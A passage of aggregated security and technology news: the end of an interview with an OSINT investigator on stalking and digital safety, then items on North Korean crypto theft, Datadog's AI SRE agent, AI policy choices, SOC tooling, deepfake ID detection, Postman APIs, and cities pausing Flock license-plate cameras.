so without risking anyone’s anonymity? A. Any of my cyberstalking or in-person stalking cases are some of the most unhinged things you can imagine. I’m very rarely surprised by something, but finding out the client I worked with was being targeted by multiple individuals with varying degrees of obsession was definitely new for me. The most important thing with this particular client was to ensure they were safe. We had to look at their entire life, and uprooted a lot of it to get them to safety. I do my best to minimize harm to their life/livelihood, but sometimes circumstances require major changes. The situation resolved as best it could. All that to say, each situation is unique and many don’t require an entire move or life change, but you assess each one individually. Q. What is the most important message you are hoping to convey through your online presence or work? A. Keep it simple. When everything complicated is failing, go back to basics, and teach them over and over again, until the audience moves forward. I’ve spent a decade doing this and still share the same basic principles and safety measures. Technology changes, so do people, but sometimes the things they need the most are to to be seen, heard and understood. This job is a lot of emotional support and working through the things where the client gets hung up making a decision, or moving forward. Q. How did you get started in this, anyway? Tell us a bit about your career. A. It all started when I was 16 and the manager of the bagel shop I worked at told me I didn’t have the skills to sell bagels. When someone in a position of authority tells you that you aren’t good enough, or can’t do something, it will go one of two ways, it will crush you or inspire you. I can’t say I was inspired then, but it did set me on a path to get me where I am now. I was told many times by a boss I was too much, too loud, too ambitious. I landed in OSINT as a result of a layoff and a romance scam. A family member was scammed out of a lot of money and reached out to me for help. I knew immediately what it was, but sometimes the person in the middle of the scam doesn’t see it. I took all the skills I learned in my career and began digging into OSINT. Turns out my background and curiosity paired well to do investigations. Q. How do you stay motivated and productive during challenging times? I imagine the cases you work on must be emotionally grueling at times. A. Some days I don’t stay motivated or productive and stare at a blank screen. I’ve learned a lot about running a business and burnout the hard way. I’d say the most important lessons learned are to have a good emotional support system and set firm boundaries around your time, cases, and emotional bandwidth to help others. The amount of energy and time devoted to cases has to have a balance. I say no to more cases than I say yes, simply because I don’t have the resources or time to do them. It’s why I’ve pivoted to teaching classes, group coaching, and providing community workshops and not only 1:1 services. Spreading out my workload and taking less cases has helped immensely to protect my own peace and mental health. I couldn’t do this work at all if I wasn’t mentally, physically and emotionally capable in my own life. What’s that saying of not being able to pour from an empty cup, you have to fill yours first, before you can help others. Q. In addition to your paid consulting I know you do a lot of help to support NGOs or simply people and families in need. Will you please describe some of that? A. As the world changes, you have to adapt and shift your tactics, delivery, and capabilities to help more people. While people like to tussle over politics, I remind them, everything is political. It’s no different in community care, mutual aid, or non-profit work. If systems cannot or won’t support communities, you have a responsibility to help build parallel systems of care that can. This means not leaving anyone behind, not sacrificing one group over another. Everyone deserves dignity, food, shelter, healthcare, and it’s why I help fundraise and partner with organizations that are already doing the work on issues that matter to me. Q. How do you see your role or purpose evolving in the future? A. I’ve been organizing since high school. I use those organizing skills to pair people who can provide mutual aid, information share online and offline communities & provide digital safety training to orgs so they can help more people. I see the organizing evolving into more grants to do more work in the local communities. As you know, it’s especially difficult to get government grants now, funding has slowed or been pulled from many community organizations. This funding gap means that you have to get creative with fundraising and finding private grants. My focus is really that communities can build more sustainable funding efforts so organizations can do their work. It’s really going to take a lot more of us to build better systems for everyone, and that includes the government. I’m inspired by all the people running for local school boards, library boards, city and town councils and local offices. It’s so important you have support and partnership with government entities and community organizations for these efforts to build sustainable community systems of care. Q. When is the time in someone’s life when they should pick up the “Bat Phone” and engage someone like you? A. It would be great if people reached out to me before they were in a crisis or an urgent situation, but oftentimes that doesn’t happen, or isn’t possible. I also recognize no matter how much I talk about privacy, safety, and the steps people can take, it’s inconvenient and not easy. The steps are simple, often the implementation isn’t. My industry and what I do is pretty unique as well, and visibility to the people who might need my help is challenging sometimes. People don’t want to put trust in someone they’ve never met, worked with, don’t recognize or haven’t engaged with before. It’s why a lot of the time, my cases or consultations are on a referral basis. I’m working on ways to expand my offerings to help more people, on a larger scale, because while I love the 1:1 work, more people need help now. Follow me on my socials and bookmark my website to get notified when all the things are live. Q. How can families create an emergency preparedness plan with cyber safety in mind? A. For cyber safety planning, there are three things I recommend every family have, a communications plan, an emergency escape plan (exits, routes, maps, roads & destination in my mind) in case of natural disaster, and family code/safety word if someone is under duress, kidnapped, or in trouble. These plans can vary in the level of complexity. If you’re already doing emergency preparedness, the items you’ll want in your go-bag, include radios or walkie talkies, chargers & cables, battery packs or solar charger, emergency contact list, important documents (hard & soft copies), medical files & information for family/kids/pets, a way to access your passwords/systems, backup USB/microSD with your important documents, comms, protocols, etc. There’s a lot more detail I’d put into an emergency cyber safety plan, but off the top of my head those are the things that I’d want. I say all this knowing people will add a dozen things to that list or take issue with what I prioritize. This list is generic in nature, and may not reflect the needs, access to resources, and situation of every person or organization. Q. How can technology be used to improve domestic abuse security and protection? A. Give resources to underserved communities and vulnerable groups. Not everyone has the same access to technology, internet, or the latest phones, computers and systems. Part of helping protect people is ensuring they have the tools, knowledge, and training to help themselves and each other, and access to those resources. Unfortunately, technology isn’t going to solve the underlying problems associated with domestic abuse, that is a human problem. Tech-enabled abuse is simply an extension of the cycle of abuse experienced in intimate partner relationships or cases of domestic violence in other relationships. What you can do with technology is skill-share, train victim advocates, connect people to one another who have resources, build communities, establish secure communication networks offline, and organize locally. Technology plays a vital role in all these ways. One of the most effective ways to help people in your own community is to do in-person safety training. Gather folks locally, and walk through the basics, together. People put off doing the security/safety steps with their devices, but will do it with others. It’s community work, relationship building, and skill sharing all rolled into one event. Q. What preventive measures can be taken to protect vulnerable members of the household? A. Communication is key when talking to chosen family/friends/kids about potential threats and risk. Establish the main concerns for your family unit with some of these questions: What are you trying to protect? Who or what are the threats? Who has access? How might these threats impact your family’s privacy or security? How likely is it that it will happen? How would they do it? Answering these questions can help determine your own threat model and what a safety plan looks like for your family. There are no right or wrong answers, simply determination of what you are trying to protect, and who you are protecting it from. Understanding the consequences if you’re targeted, who might target you, helps prepare you for how to respond in a crisis. Q. How important is security community awareness and involvement in domestic safety? A. One of the principles I teach is threat modeling, whether you’re the person in the situation, adjacent to it, or simply have an interest in helping. Part of threat modeling is knowing how someone is at-risk, the level of monitoring/surveillance, the threat level, what might happen, what is likely to happen, what has happened. Each situation is unique, and requires a slightly different response or plan. You have to take into consideration the family/friends, their support system, their capacity, their finances, all things required to move someone out of a dangerous situation. Additionally, does their spouse/partner/stalker monitor their devices and how that impacts your ability to help them. The broader security community understands threat modeling when it comes to cybersecurity, you can apply those same ideas to domestic abuse & stalking situations. You’re doing an assessment or audit of the tools, threat actors, activity, expected or anticipated outcomes. Clearly I’m simplifying the problem solving, but there are tangible and tactical ways to help people, and that starts with threat modeling, harm reduction, and meeting them where they are emotionally, physically and mentally. Q. If you had one wish for support from the security community to help aiding in protection of the most vulnerable people, what would it be? A. Listen to marginalized and vulnerable people when they tell you what they’ve experienced, how to fix it, especially when it comes to harm reduction. The idea that we should move fast and break things means it comes at the cost of other human beings, their dignity, their choices, their rights, their autonomy, their humanity. Everything has a human cost, especially where technology is involved. Anything created can be used for good or it can be abused. Our community has an obligation to ensure tech is created with ethics, integrity and guardrails in place to minimize the harm. There’s so many opportunities to help others with the skills people in the security community have. Teach someone what you know, skill-share, provide scholarships and mutual aid, build community. All of us matter, or none of us do.
securityweek.comDec 22, 2025extracted
Over $3.4 billion in crypto stolen throughout 2025, with North Korea again the top culprit
Over $3.4 billion in crypto stolen throughout 2025, with North Korea again the top culprit More than $3.4 billion was stolen from the cryptocurrency industry in 2025, according to a new report, with the majority of those losses tied to North Korean hackers. Blockchain security company Chainalysis published its annual report covering the year’s crypto theft, finding a general shift toward larger, costlier attacks and new tactics used by North Korean hackers to launder stolen funds. While Chainalysis noted an increase in the number of private owners having their cryptocurrency stolen, one of the main takeaways from this year’s report is North Korea’s ability to focus its efforts on a smaller number of attacks with higher payouts. Andrew Fierman, head of national security intelligence at Chainalysis, told Recorded Future News they saw North Korean-linked operators “maintained a consistent laundering cycle using mixers, DeFi protocols, bridges, and no-KYC exchanges in addition to underground informal Chinese money laundering networks.” Of the $3.4 billion in crypto stolen from January to December, Chainalysis attributed at least $2.02 billion to North Korean hackers. The figure is $681 million more than what the country’s hackers are estimated to have stolen in 2024. Much of the figure is attributed to the $1.5 billion theft from Dubai-based platform Bybit in February, but two weeks ago South Korean officials also accused North Korea of stealing $30 million worth of cryptocurrency from crypto platform Upbit. Fierman declined to say what other incidents Chainalysis is tying to North Korea but said the country focused on large, centralized targets with significant reserves in 2025. The hackers typically were able to steal private keys — pivotal cryptographic secrets that grant a person full control over digital assets. Fierman tied the incidents to North Korea’s parallel IT worker campaign, where members of the country’s military surreptitiously get hired at Western tech companies. The IT worker campaign has been adept at getting North Koreans hired at crypto exchanges, custodians, and web3 firms, allowing them to steal information later used for attacks or place backdoors that enable lateral movement within the crypto industry. “This year was defined by a small number of large private key compromises of centralized services, which materially shaped the totals. Social engineering continues to be the primary attack vector – whether by posing as IT workers or as recruiters to earn trust and gain access to victims’ systems,” Fierman explained. “However, North Korea continues to be creative in its approach to exploiting security vulnerabilities, as noted by the supply chain exploit via a third-party vendor in the ByBit hack.” North Korea has used the IT worker campaign and the crypto thefts as a key revenue source to make up for being cut off from the global financial system. Chainalysis said this was the most severe year on record for North Korean crypto thefts because the country is responsible for 76% of all crypto service compromises based on value stolen. Since Chainalysis began tracking the figures in 2022, North Korea has stolen $6.75 billion in crypto. The United Nations said last year that it is tracking dozens of incidents over a five-year period that have netted North Korea about $3 billion. North Korea also stood out in 2025 because they laundered the stolen funds in ways different from most cybercriminals. Pyongyang hackers typically launder funds in $500,000 chunks rather than the typical $1 million to $10 million range. They also prefer to use Chinese language platforms that have weak compliance controls like Cambodian site Huione — which was sanctioned by U.S. officials this year. Chainalysis said last year that Huione has processed more than $49 billion in cryptocurrency transactions since 2021. “Their heavy use of professional Chinese-language money laundering services and over-the-counter (OTC) traders suggests that DPRK threat actors are tightly integrated with illicit actors across the Asia-Pacific region, and is consistent with Pyongyang’s historical use of China-based networks to gain access to the international financial system,” Chainalysis experts said. Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.
therecord.mediaDec 18, 2025extracted
Datadog introduces Bits AI SRE to automate alert investigation and root cause analysis
Datadog introduces Bits AI SRE to automate alert investigation and root cause analysis Datadog has launched Bits AI SRE, an AI agent aware of telemetry, architecture, and organizational context that investigates alerts and surfaces action able root cause in minutes, giving engineers the information they need to confidently resolve incidents faster, save engineering hours, and reduce end-user and business impact. Bits AI SRE is part of Datadog’s Bits AI, a suite of AI capabilities that works autonomously across critical monitoring, development, and security workflows to help teams resolve application issues in real time. Incident response is a high-stakes process for every digital business. When production issues occur, every second of downtime increases the risk of losing customer trust. The challenge is exacerbated as root causes become harder to find amid increasing fragmentation across systems and organizations. Although many teams are eager to adopt AI-powered agents to overcome this burden, point solutions struggle to access and understand the scale and complexity of real production systems. Bits AI SRE provides an understanding of organizations’ systems to identify and resolve alerts fast. When an alert fires, Bits AI SRE rapidly analyzes runbooks, telemetry, and more, to separate signal from noise and uncover hypothetical root causes. It validates its own findings, identifies a final conclusion, and delivers that conclusion directly to third-party collaboration tools-all before on-call responders even log in. What used to take hours to troubleshoot manually, can now be done in minutes autonomously by Bits AI SRE, representing a step toward a future where engineers can focus less on managing incidents and more on building resilient systems. Designed for enterprise scale, Bits AI SRE supports HIPAA-regulated workloads, includes role-based access controls (RBAC), and features enterprise contracts with trusted AI partners-ensuring organizations adopt AI with confidence and control. “This launch represents a pivotal expansion of Datadog’s AI strategy as our first generally available AI agent, and signals a new phase of intelligent, automated reliability,” said Yanbing Li, Chief Product Officer at Datadog. “Bits AI SRE allows companies to mitigate issues faster, reduce customer impact, and adopt AI safely. It has already been tested against more than 2,000 customer environments, including both global enterprises and fast-growing start-ups with a diverse range of production environments. Tens of thousands of investigations have run to date, from routine alerts to high-severity incidents, with organizations already reporting positive outcomes. This reflects the tangible and immediate value, tied directly to operational and business outcomes, that we are delivering.” “During an incident, the first five minutes are critical. Bits AI helps us cut through the noise by instantly surfacing the right context and correlations across our systems,” said Thiyagarajan Anandan, Senior Engineering Manager at Uber Freight. “With smart tagging and naming, it automatically guides engineers to the right information, reducing cognitive load and giving us clarity and control when it matters most.” “With Bits AI SRE being on-call 24/7 for us, MTTR for our services have improved significantly,” said Andrew Seok Ju Kim, Data Engineer at DelightRoom. “For most cases, the investigation is already taken care of well before our engineers sit down and open their laptops to assess the issue.”
helpnetsecurity.comDec 3, 2025extracted
Like Social Media, AI Requires Difficult Choices
Like Social Media, AI Requires Difficult Choices In his 2020 book, “Future Politics,” British barrister Jamie Susskind wrote that the dominant question of the 20th century was “How much of our collective life should be determined by the state, and what should be left to the market and civil society?” But in the early decades of this century, Susskind suggested that we face a different question: “To what extent should our lives be directed and controlled by powerful digital systems—and on what terms?” Artificial intelligence (AI) forces us to confront this question. It is a technology that in theory amplifies the power of its users: A manager, marketer, political campaigner, or opinionated internet user can utter a single instruction, and see their message—whatever it is—instantly written, personalized, and propagated via email, text, social, or other channels to thousands of people within their organization, or millions around the world. It also allows us to individualize solicitations for political donations, elaborate a grievance into a well-articulated policy position, or tailor a persuasive argument to an identity group, or even a single person. But even as it offers endless potential, AI is a technology that—like the state—gives others new powers to control our lives and experiences. We’ve seen this play out before. Social media companies made the same sorts of promises 20 years ago: instant communication enabling individual connection at massive scale. Fast-forward to today, and the technology that was supposed to give individuals power and influence ended up controlling us. Today social media dominates our time and attention, assaults our mental health, and—together with its Big Tech parent companies—captures an unfathomable fraction of our economy, even as it poses risks to our democracy. The novelty and potential of social media was as present then as it is for AI now, which should make us wary of its potential harmful consequences for society and democracy. We legitimately fear artificial voices and manufactured reality drowning out real people on the internet: on social media, in chat rooms, everywhere we might try to connect with others. It doesn’t have to be that way. Alongside these evident risks, AI has legitimate potential to transform both everyday life and democratic governance in positive ways. In our new book, “Rewiring Democracy,” we chronicle examples from around the globe of democracies using AI to make regulatory enforcement more efficient, catch tax cheats, speed up judicial processes, synthesize input from constituents to legislatures, and much more. Because democracies distribute power across institutions and individuals, making the right choices about how to shape AI and its uses requires both clarity and alignment across society. To that end, we spotlight four pivotal choices facing private and public actors. These choices are similar to those we faced during the advent of social media, and in retrospect we can see that we made the wrong decisions back then. Our collective choices in 2025—choices made by tech CEOs, politicians, and citizens alike—may dictate whether AI is applied to positive and pro-democratic, or harmful and civically destructive, ends. A Choice for the Executive and the Judiciary: Playing by the Rules The Federal Election Commission (FEC) calls it fraud when a candidate hires an actor to impersonate their opponent. More recently, they had to decide whether doing the same thing with an AI deepfake makes it okay. (They concluded it does not.) Although in this case the FEC made the right decision, this is just one example of how AIs could skirt laws that govern people. Likewise, courts are having to decide if and when it is okay for an AI to reuse creative materials without compensation or attribution, which might constitute plagiarism or copyright infringement if carried out by a human. (The court outcomes so far are mixed.) Courts are also adjudicating whether corporations are responsible for upholding promises made by AI customer service representatives. (In the case of Air Canada, the answer was yes, and insurers have started covering the liability.) Social media companies faced many of the same hazards decades ago and have largely been shielded by the combination of Section 230 of the Communications Act of 1994 and the safe harbor offered by the Digital Millennium Copyright Act of 1998. Even in the absence of congressional action to strengthen or add rigor to this law, the Federal Communications Commission (FCC) and the Supreme Court could take action to enhance its effects and to clarify which humans are responsible when technology is used, in effect, to bypass existing law. A Choice for Congress: Privacy As AI-enabled products increasingly ask Americans to share yet more of their personal information—their “context“—to use digital services like personal assistants, safeguarding the interests of the American consumer should be a bipartisan cause in Congress. It has been nearly 10 years since Europe adopted comprehensive data privacy regulation. Today, American companies exert massive efforts to limit data collection, acquire consent for use of data, and hold it confidential under significant financial penalties—but only for their customers and users in the EU. Regardless, a decade later the U.S. has still failed to make progress on any serious attempts at comprehensive federal privacy legislation written for the 21st century, and there are precious few data privacy protections that apply to narrow slices of the economy and population. This inaction comes in spite of scandal after scandal regarding Big Tech corporations’ irresponsible and harmful use of our personal data: Oracle’s data profiling, Facebook and Cambridge Analytica, Google ignoring data privacy opt-out requests, and many more. Privacy is just one side of the obligations AI companies should have with respect to our data; the other side is portability—that is, the ability for individuals to choose to migrate and share their data between consumer tools and technology systems. To the extent that knowing our personal context really does enable better and more personalized AI services, it’s critical that consumers have the ability to extract and migrate their personal context between AI solutions. Consumers should own their own data, and with that ownership should come explicit control over who and what platforms it is shared with, as well as withheld from. Regulators could mandate this interoperability. Otherwise, users are locked in and lack freedom of choice between competing AI solutions—much like the time invested to build a following on a social network has locked many users to those platforms. A Choice for States: Taxing AI Companies It has become increasingly clear that social media is not a town square in the utopian sense of an open and protected public forum where political ideas are distributed and debated in good faith. If anything, social media has coarsened and degraded our public discourse. Meanwhile, the sole act of Congress designed to substantially reign in the social and political effects of social media platforms—the TikTok ban, which aimed to protect the American public from Chinese influence and data collection, citing it as a national security threat—is one it seems to no longer even acknowledge. While Congress has waffled, regulation in the U.S. is happening at the state level. Several states have limited children’s and teens’ access to social media. With Congress having rejected—for now—a threatened federal moratorium on state-level regulation of AI, California passed a new slate of AI regulations after mollifying a lobbying onslaught from industry opponents. Perhaps most interesting, Maryland has recently become the first in the nation to levy taxes on digital advertising platform companies. States now face a choice of whether to apply a similar reparative tax to AI companies to recapture a fraction of the costs they externalize on the public to fund affected public services. State legislators concerned with the potential loss of jobs, cheating in schools, and harm to those with mental health concerns caused by AI have options to combat it. They could extract the funding needed to mitigate these harms to support public services—strengthening job training programs and public employment, public schools, public health services, even public media and technology. A Choice for All of Us: What Products Do We Use, and How? A pivotal moment in the social media timeline occurred in 2006, when Facebook opened its service to the public after years of catering to students of select universities. Millions quickly signed up for a free service where the only source of monetization was the extraction of their attention and personal data. Today, about half of Americans are daily users of AI, mostly via free products from Facebook’s parent company Meta and a handful of other familiar Big Tech giants and venture-backed tech firms such as Google, Microsoft, OpenAI, and Anthropic—with every incentive to follow the same path as the social platforms. But now, as then, there are alternatives. Some nonprofit initiatives are building open-source AI tools that have transparent foundations and can be run locally and under users’ control, like AllenAI and EleutherAI. Some governments, like Singapore, Indonesia, and Switzerland, are building public alternatives to corporate AI that don’t suffer from the perverse incentives introduced by the profit motive of private entities. Just as social media users have faced platform choices with a range of value propositions and ideological valences—as diverse as X, Bluesky, and Mastodon—the same will increasingly be true of AI. Those of us who use AI products in our everyday lives as people, workers, and citizens may not have the same power as judges, lawmakers, and state officials. But we can play a small role in influencing the broader AI ecosystem by demonstrating interest in and usage of these alternatives to Big AI. If you’re a regular user of commercial AI apps, consider trying the free-to-use service for Switzerland’s public Apertus model. None of these choices are really new. They were all present almost 20 years ago, as social media moved from niche to mainstream. They were all policy debates we did not have, choosing instead to view these technologies through rose-colored glasses. Today, though, we can choose a different path and realize a different future. It is critical that we intentionally navigate a path to a positive future for societal use of AI—before the consolidation of power renders it too late to do so. This post was written with Nathan E. Sanders, and originally appeared in Lawfare.
schneier.comDec 2, 2025extracted
3 SOC Challenges You Need to Solve Before 2026
2026 will mark a pivotal shift in cybersecurity. Threat actors are moving from experimenting with AI to making it their primary weapon, using it to scale attacks, automate reconnaissance, and craft hyper-realistic social engineering campaigns. The Storm on the Horizon Global world instability, coupled with rapid technological advancement, will force security teams to adapt not just their defensive technologies but their entire workforce approach. The average SOC already processes about 11,000 alerts daily, but the volume and sophistication of threats are accelerating. For business leaders, this translates to direct impacts on operational continuity, regulatory compliance, and bottom-line financials. SOCs that can't keep pace won't just struggle; they'll fail spectacularly. Solve these three core issues now, or pay dearly later. 1. Evasive Threats Are Slipping Through—And Getting Smarter Fast Attackers have mastered evasion. ClickFix campaigns trick employees into pasting malicious PowerShell commands by themselves. LOLBins are abused to hide malicious behavior. Multi-stage phishing hides behind QR codes, CAPTCHAs, rewritten URLs, and fake installers. Traditional sandboxes stall because they can't click "Next," solve challenges, or follow human-dependent flows. Result? Low detection rates for the exact threats exploding in 2025 and beyond. Fix it with interactive malware analysis ANY.RUN's Interactive Sandbox with Automated Interactivity uses machine learning to automatically interact with malware samples, bypassing CAPTCHAs on phishing sites and completing necessary actions to force malware execution. The platform doesn't just observe, it actively engages with threats the way a human analyst would, but at machine speed. Through Smart Content Analysis, the sandbox automatically identifies and detonates key components at each stage of the attack chain. It extracts URLs from QR codes, removes security rewrites from modified links, bypasses multi-stage redirects, processes email attachments, and executes payloads hidden within archives. The business impact is immediate. By revealing the full attack chain in real time, ANY.RUN enables SOC teams to uncover entire attack sequences, retrieve IOCs, and refine detection rules within seconds rather than hours. 2. Alert Avalanches Are Burning Out Your Tier 1 Team Thousands of daily alerts, mostly false positives. An average SOC handles 11,000 alerts daily, with only 19% worth investigating, according to the 2024 SANS SOC Survey. Tier 1 analysts drown in noise, escalating everything because they lack context. Every alert becomes a research project. Every investigation starts from zero. Burnout hits hard. Turnover doubles, morale tanks, and real threats hide in the backlog. By 2026, AI-orchestrated attacks will flood systems even faster, turning alert fatigue into a full-blown crisis. Clear the chaos with actionable threat intelligence ANY.RUN's Threat Intelligence Lookup and TI Feeds transform alert triage by delivering 24× more IOCs per incident from 15,000+ SOC environments conducting real-world investigations, providing instant, deep context on emerging threats so analysts can confirm and contain attacks in seconds. Instead of starting every investigation from scratch, analysts query a single artifact and instantly receive complete intelligence: indicator verdict, geotargeting and urgency, associated campaigns, targeting patterns, related indicators, and MITRE ATT&CK mappings. The sandbox integration is particularly helpful for junior analysts who may lack the skills and experience required for advanced malware analysis. 3. Proving ROI: Making the Business Case for Cyber Defense From a financial leadership perspective, security spending often feels like a black hole: money is spent, but risk reduction is hard to quantify. SOCs are challenged to justify investments, especially when security teams seem to be a cost center without clear profit or business-driving impact. ANY.RUN shows that threat intelligence can actually save money and deliver business value. Here’s how: Preventing Breaches: Threat Intelligence Feeds provide real-time IOCs collected from live sandbox investigations across 15,000+ organizations, helping prevent attacks before they hit. Reducing False Positives: By filtering out low-risk alerts and surfacing only high-confidence malicious indicators, SOC teams spend less time chasing noise. Automating Triage: Enrich alerts with contextual intelligence automatically (via API/SDK), reducing Tier 1 workload, lowering overtime and turnover costs. Faster Response: TI Lookup links each IOC to a sandbox report, giving complete visibility into how malware behaves — enabling faster, more effective containment. Continuous Updating: TI Feeds are continuously refreshed with unique, verified IOCs, helping your SOC stay ahead of emerging threats without manual research. Why this matters for 2026: In an era where cyber risk can directly impact financial performance, being able to demonstrate that security investments reduce risk, save resources, and improve operational efficiency is essential. Modern threat intelligence from ANY.RUN turns the SOC from a cost center into a value-generating asset. Take Control Before 2026 Hits AI is rewriting the rules of cyber defense. Evasive threats, alert overload, and budget scrutiny aren't future problems, they're today's warnings. Tackle them with interactive analysis and real-time intelligence that actually works. Future-proof your SOC, keep your team sane, and turn security into a business asset. Ready to prove SOC ROI? Get your custom threat intel demo now
thehackernews.comNov 25, 2025extracted
ID-Pal upgrades ID-Detect, delivering protection against deepfakes and synthetic IDs
ID-Pal upgrades ID-Detect, delivering protection against deepfakes and synthetic IDs ID-Pal has announced a major enhancement to its document-fraud detection feature, ID-Detect, delivering even more powerful defences against AI-generated digital manipulation—one of the fastest-growing threats facing financially regulated enterprises and payments providers. ID-Pal’s document-fraud detection feature has now been strengthened to safeguard against four distinct categories of presentation attacks, with the fourth and newest category offering advanced detection of digital manipulation: Screen replay attacks – where stolen images or videos are reused to impersonate real users Printed copy attacks – involving forged, photocopied or reprinted identity documents Portrait substitution attacks – where the photo on a genuine ID is replaced or swapped AI-driven digital manipulation (enhanced) – including deepfake documents, AI-generated forgeries, synthetic identities and any tampering carried out with editing software This latest enhancement provides expanded detection of emerging manipulation techniques, enabling businesses to identify tampered, fabricated or synthetically generated documents with greater accuracy and speed. ID-Detect’s AI-driven document authentication engine identifies evidence of digital manipulation and the indicators of presentation attacks. Its models are trained to detect discrepancies such as pixelation, texture differences, pattern irregularities and other inconsistencies, ensuring screen-based fraud is flagged immediately and removed from the onboarding flow. When a suspicious document is flagged, ID-Detect “quarantines” it with a reason code, giving compliance teams the insight needed for faster, more confident decision-making. With reduced false positives, smoother onboarding for genuine customers and flexible configuration options, ID-Detect enables enterprises to protect against AI-driven fraud without adding friction for trusted users. Together, these layers provide a shield against AI-driven document fraud that reduces manual review, minimises business losses and supports frictionless customer experiences. The enhancement arrives as regulators—including FATF and the EBA—call for stronger controls against synthetic IDs, deepfakes and tampered documents. The payments sector continues to cite financial crime and cybersecurity as its most pressing challenge. A recent report by The Payments Association showed that 72% of respondents identify fraud as their biggest concern, particularly in the face of rapidly evolving AI-enabled threats. With advanced generative tools now freely available, fraudsters can create sophisticated fake identities that bypass legacy verification systems. These enhancements to ID-Detect allow financial institutions and enterprises to stay ahead of AI-fraud and future-proof their compliance processes. The effectiveness of ID-Detect is demonstrated by UK car financing platform Finset, which integrated ID-Pal to counter a surge in asset-finance fraud. ID-Detect has caught fraud valued at over £3 million in just two years for Finset, while improving compliance with regulatory requirements and increasing operational efficiency. “Fraud teams are under huge pressure as AI threats are continuously evolving. This enhancement ensures our customers stay ahead of that curve. ID-Detect now provides some of the most advanced detection capabilities on the market, giving enterprises a powerful defence against AI-generated document fraud,” said Rob Sheehan, Head of Product at ID-Pal. “ID-Pal was founded to empower businesses with identity verification built with world-class technologies. With AI-driven document fraud the biggest threat our industry has ever faced, it is pivotal that businesses have robust tools to that detect and defeat against fraud at every entry point, while ensuring seamless compliance,” adds Colum Lyons, CEO of ID-Pal.
helpnetsecurity.comNov 20, 2025extracted
Postman expands platform with features for building AI-ready APIs
Postman expands platform with features for building AI-ready APIs Postman announced several updates bringing key enterprise features to its platform, so customers can build AI-ready APIs that meet the most critical enterprise specifications. As software increasingly shifts from applications to AI agents, the enterprise challenge has become clear: these agents are only as capable as the APIs that inform them. APIs deliver the context that fuels intelligence, yet most organizations lack the governance, visibility, and consistency required to make their APIs trustworthy for AI systems. According to Postman’s 2025 State of the API Report, fewer than 40% of organizations enforce centralized governance standards, and while more than half of APIs are internal, many lack consistent documentation and visibility—limiting how effectively AI agents can interpret and use them. “We’ve reached a pivotal moment in the AI transition,” said Balaji Raghavan, Head of Engineering at Postman. “Enterprises are realizing that their APIs are not yet AI-ready. Today’s updates establish the governance, automation, and observability needed to make APIs safe, reliable, and discoverable by both humans and AI systems, without slowing down developer velocity.” New features and enhancements announced improve the enterprise-readiness of the Postman API platform, ensuring the trust, safety, and governance that AI-ready APIs require: Spec Hub: the governance backbone for AI-ready APIs: Enhances Postman’s governance backbone with bidirectional spec sync, modular multi-file specs, and new governance reporting, enabling large teams to standardize design and governance across every API. Pipeline-native validation for every API: Private API Runners (Early Access) and On-Demand Monitors extend Postman’s trusted testing framework to deploy-time gates and internal environments so every change is validated under real-world conditions. With new Slack and Microsoft Teams integrations, test results and alerts are visible where teams already collaborate, accelerating response time and helping enterprises maintain reliability across every release. Unified visibility and control: New Runner Management gives platform admins full visibility into API test automation activity, health, and access, unlocking enterprise scale without sacrificing compliance or security. Developer velocity without friction: Updates to the Postman CLI, the redesigned Home experience, and the Collection Status Indicator reduce context switching and improve coordination across design, testing, and deployment. Teams stay in flow and deliver quality APIs faster, without sacrificing the simplicity and usability developers already trust. Together, these capabilities make Postman the enterprise control plane for the modern API ecosystem: public or private, human, or AI. As AI systems continue to evolve from tools to teammates, the Postman platform will continue to serve as critical infrastructure to support this new and growing wave of AI agents.
helpnetsecurity.comNov 7, 2025extracted
Cities reverse course on automated license plate reader cameras amid privacy concerns
Cities reverse course on automated license plate reader cameras amid privacy concerns Cambridge, Massachusetts, officials turned off 16 automated license plate reader cameras (ALPR) last week after the city council voted to pause their use following reports of the cameras’ manufacturer sharing data with immigration authorities. Cambridge is one of several cities where the Flock Safety cameras — which are now present in thousands of cities across the country — have recently been taken offline. On October 14, Eugene, Oregon officials disabled 57 cameras there after the City Council voted to pause their use following an intense backlash from residents. Officials in Austin, Texas ended their contract with Flock in June amid similar public objections. In August, Evanston, Illinois deactivated 19 cameras. The move by cities to halt their work with Flock follows reports that the company shared data from local partners with federal immigration authorities. Residents in all cities which have disabled the cameras had fought their use. A Cambridge City Councilor, Patty Nolan, said she is concerned by reports that police in Texas used data from Flock cameras in several jurisdictions to track a woman who self-administered an abortion as part of a criminal investigation. Councilors also were alarmed by use of camera data for immigration arrests, she said. “Flock data has been used and requisitioned by federal immigration officials for work that I don't want us to be cooperating on,” Nolan said. “It's not our job to do their work.” Cambridge officials and the City Council are currently reviewing Flock’s data practices and the city’s contract with the firm and will determine soon if the city will end its contract with the ALPR manufacturer. Nolan said the vote to pause the contract was unanimous and that councilors are focused on understanding what guardrails are in place to prevent Flock from sharing data from the city with outside agencies. She said she also has seen no evidence that use of Flock cameras reduces crime. Police in some jurisdictions have fought to continue using the cameras. The police chief in Eugene told the public that the Flock cameras played a pivotal role in investigating a series of burglaries targeting Asian business owners for which officers had recently made arrests. “The ALPR technology was a critical investigative tool in providing a turning point to help solve this case,” Eugene Police Chief Chris Skinner said in a prepared statement on October 10. “This is an example of how this technology can serve victims of crime in a more effective and efficient way.” Evanston officials have said they decided to turn off their Flock cameras after a state audit revealed the company had shared city residents’ license plate data with federal authorities in violation of state law. “The findings of the Illinois Secretary of State’s audit, combined with Flock’s admission that it failed to establish distinct permissions and protocols to ensure local compliance while running a pilot program with federal users, are deeply troubling,” a city of Evanston press release said. The company reportedly later reinstalled cameras in Evanston, leading officials there to cover them in plastic bags so they would not work. A Flock spokesperson declined to comment about the Evanston allegations. In Denver, residents and city councilors are now fighting Mayor Mike Johnston over plans to continue the city’s contract with Flock. Flock is not trustworthy, City Council Member-at-Large Sarah Parady said. Police officials there have said they were unaware that the company shared Denver’s data with law enforcement in outside jurisdictions, she said. Such sharing is especially concerning to Parady because many women from Texas come to Colorado to obtain legal abortions. A spokesperson for Johnston did not immediately respond to a request for comment. Parady said she also worries about federal immigration authorities using Flock data to seize undocumented people. Even if Flock data were not being shared with outside agencies, however, Paraday said she still opposes their use because of how Flock trains its AI to predict people’s patterns of travel. “That kind of surveillance is not something that a human mind looking at physical images or looking at a car driving by could do by itself, and so it's really come a very long way from the Fourth Amendment doctrine of kind of plain view searches and the 